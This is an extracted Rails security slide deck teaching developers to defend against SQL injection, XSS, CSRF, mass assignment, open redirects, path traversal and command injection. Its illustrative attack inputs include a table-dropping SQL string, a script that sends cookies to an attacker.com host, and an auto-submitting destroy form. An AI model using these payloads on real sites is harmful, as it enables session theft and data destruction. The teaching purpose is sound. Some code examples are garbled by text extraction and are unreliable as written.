2. About Me
⢠a.k.a. ihower
⢠http://ihower.tw
⢠http://twitter.com/ihower
⢠http://github.com/ihower
⢠Ruby on Rails Developer since 2006
⢠Ruby Taiwan Community
⢠http://ruby.tw
3. Defense in Depth
⢠Network: ďŹrewalls, IDS
⢠Operating system
⢠Web server
⢠Web application
⢠Database
4. 75% of attacks are at the
web application layer
(By The Gartnet Group estimation)
5. What is Security?
⢠a measurement, not a characteristic
⢠not a simple requirement to be met...
⢠must be balanced with expense
⢠itâs easy and relatively inexpensive to provide a sufďŹcient level of security
for most applications. But if you need more...
⢠must be balanced with usability
⢠itâs often increase security also decrease the user usability...
⢠must be part of the design
(from PHP Security Guide: Overview)
6. Okay, your users are evil,
they will give you illegitimate operation and data.
10. Web and Application
Server?
⢠Server Header
⢠apache
⢠nginx
⢠mongrel
⢠mod_rails
11. Disable Server Header
Server:Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Phusion_Passenger/2.2.9
â # apache2.conf
ServerSignature Off
ServerTokens Prod
Server:Apache
12. SVN metadata
⢠GET http://your_site.org/.svn/entries
â <DirectoryMatch "^/.*/.svn/">
ErrorDocument 403 /404.html
Order allow,deny
Deny from all
Satisfy All
</DirectoryMatch>
Or just delete it:
http://plog.longwin.com.tw/my_note-unix/2008/01/07/ďŹnd_delete_svn_directory_2008
13. Sensitive Information
⢠Do not store sensitive information in the
clear
⢠cookie
⢠session(or ďŹash)
⢠memory for a long time
⢠log ďŹles
⢠cache
15. Cookie Session Storage
# config/initializers/session_store.rb
ActionController::Base.session = {
:key => '_app_session',
:secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...'
}
⢠Donât use a trivial secret
⢠Donât store any secret information here
⢠Or.... just switch to another session storage
16. Session
The session id is a 32 byte long MD5 hash value.
⢠Hijacking
⢠Fixation
⢠reset_session after every login
17. SQL injection
x'; DROP TABLE users; --
Project.find(:all, :conditions => "name = '#{params[:name]}'")
SELECT * FROM projects WHERE name = 'x'; DROP TABLE users; --â
18. SQL injection
vulnerabilities:
⢠ďŹnd_by_sql
⢠execute
⢠ďŹnd with conditions in a string
⢠limit and offset (before rails 2.1.1)
⢠group_by
⢠order
19. Always use the hash or
array form
â
Project.find(:all, :conditions => { :name => params[:name] } )
# or
Project.find(:all, :conditions => ["name = ?", params[:name] ] )
20. Only allow predeďŹne
value
class User < ActiveRecord::Base
â def self.find_with_order(order)
raise "SQL Injection Warning" unless ["id","id desc"].include?(order)
find(:all, :limit => 1, :order => order )
end
end
21. Use quote if you need
pass it directly
ActiveRecord::Base::connection.quote
class User < ActiveRecord::Base
â def self.find_with_order(order)
find(:all, :order => connection.quote(order) )
end
end
22. Mass assignment
def create
params[:user] #=> {:name => âow3nedâ, :is_admin => true}
@user = User.create(params[:user])
end
def update
@user = User.update_attributes(params[:user])
end
23. Protect it!
â class User < ActiveRecord::Base
attr_protected :admin
end
# or
class User < ActiveRecord::Base
attr_accessible :name
end
25. Unscoped ďŹnds
class UserOrdersController < ApplicationController
def show
@order = Order.find(params[:id])
end
â
def show
@order = current_user.orders.find(params[:id]
end
26. Controller Exposing
methods
⢠Use protected and private
⢠If use RESTful design, do not use default
routes
⢠http://ihower.tw/blog/archives/3265
27. XSS(Cross-Site Scripting)
malicious users inject client-side script into web pages viewed by other users
<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' +
document.cookie + '">');</script>
⢠Do not want to build black-list, you can ďŹnd more at
http://ha.ckers.org/xss.html
28. XSS Protection (Rails2)
⢠Use escapeHTML() (or its alias h()) method
⢠Plugins
⢠http://github.com/nzkoz/rails_xss (for Rails 2.3)
⢠http://agilewebdevelopment.com/plugins/safe_erb
⢠http://code.google.com/p/xss-shield/ (Tainting way)
29. XSS Protection (Rails3)
⢠Rails 3 auto escape string
⢠Unless you html_safe or raw string
⢠â<p>safe</p>â.html_safe
⢠raw(â<p>safe</p>â)
30. Allow user to use
simple HTML code
⢠Use white-list sanitize() method
⢠If you use Textile or Markdown markup
language, you still need sanitize it.
31. CSRF
Cross-Site Request Forgery
Use another usersâ authorization token to
interact with a web application as the trusted
user in a malicious way.
32. CSRF protection (1)
⢠Use GET request for safe operation such as
a query, read operation, or lookup
⢠Use POST request for any destructive
actions such as create, update, delete
33. But...
⢠POST requests can be sent automatically,
too. An example:
<a href="http://www.harmless.com/" onclick="
var f = document.createElement('form');
f.style.display = 'none';
this.parentNode.appendChild(f);
f.method = 'POST';
f.action = 'http://www.example.com/account/destroy';
f.submit();
return false;">To the harmless survey</a>
34. CSRF protection (2)
protect_from_forgery will check all POST requests for a security token
â class ApplicationController < ActionController::Base
protect_from_forgery
end
<form action="/projects/1" class="edit_project" enctype="multipart/form-data"
id="edit_project_1" method="post">
<div style="margin:0;padding:0;display:inline">
<input name="_method" type="hidden" value="put" />
<input name="authenticity_token" type="hidden" value="cuI
+ljBAcBxcEkv4pbeqLTEnRUb9mUYMgfpkwOtoyiA=" />
</div>
35. Redirection
Do not allow user to pass (parts of) the URL for redirection directly
def legacy
redirect_to(params.update(:action=>'main'))
end
http://www.example.com/site/legacy?param1=xy¶m2=23&host=www.attacker.com
36. File Uploads: Overwrite
⢠Make sure ďŹle uploads donât overwrite
important ďŹles. eg. â../../../etc/passwdâ
⢠Validate ďŹle name is simple. Donât try to
remove malicious parts.
⢠Use plugins: attachment_fu or paperclip
37. File Uploads: Executable
⢠never to allow users to upload any extension
associated with executable content on your
site (.php, .cgi ...etc)
⢠when user download, set the appropriate
Content-Type HTTP header, eliminate the
potential for XSS attacks.
⢠or never let these ďŹles be not accessible to
your web server (outside the DocumentRoot
in Apache)
39. Command Line
Injection
system("/bin/echo","hello; rm *")
# prints "hello; rm *" and does not delete files
40. denial-of-service
attacks (DoS)
⢠Avoid Long-running action, use background-
processing.
⢠Donât bother your application server
⢠Use Web server provide static ďŹles
⢠Use HTTP reverse proxy if need
41. Host
⢠Platform (Windows, Linux, Solaris, BSDs)
choosing one which you can trust and familiar
⢠Firewall
you can use nmap tool to show which ports are open
⢠SSH: move port 22 to another
⢠Turn off any services that you arenât using.
⢠Hire system administrator to help
Your time as a developer should be spent on the things your are good at.
43. Fail Close
# fail open way, itâs bad
def show
@invoice = Invoice.find(params[:id])
unless @user.validate_code( @invoice.code )
redirect_to :action => 'not_authorized'
end
end
# fail close way
def show
@invoice = Invoice.find(params[:id])
if @user.validate_code( @invoice.code )
â else
redirect_to :action => 'authorized
redirect_to :action => 'not_authorized'
end
end
44. Whitelisting
use whitelist, blacklist is hardly complete
admins = %{ihower ihover}
# fail close way
if admins.include? user
â
redirect_to :action => 'authorized'
else
redirect_to :action => 'not_authorized'
end
# fail open way, donât do this
if !admins.include? user
redirect_to :action => 'not_authorized'
else
redirect_to :action => 'authorized'
end
45. Conclusion
⢠Rails has many security features enabled by
default
⢠SQL quoting
⢠HTML sanitization
⢠CSRF protection
46. Reference
⢠Agile Web Development with Rails 3rd. Chap.27 Securing Your Rails Application
(Pragmatic)
⢠Rails2 Chap.13 Security and Performance Enhancements (friendsof)
⢠Advanced Rails Chap.5 Security (OâReilly)
⢠Security Audit by Aaron Bedra (Peepcode)
⢠Security on Rails (Pragmatic)
⢠PHP Security Guide
⢠http://blog.innerewut.de/2009/11/3/ruby-en-rails-2009-recap
⢠http://guides.rubyonrails.org/security.html
⢠http://www.rorsecurity.info
⢠http://asciicasts.com/episodes/178-seven-security-tips
⢠http://www.ultrasaurus.com/sarahblog/2010/01/rails-security-review-checklist/
⢠http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
⢠http://www.owasp.org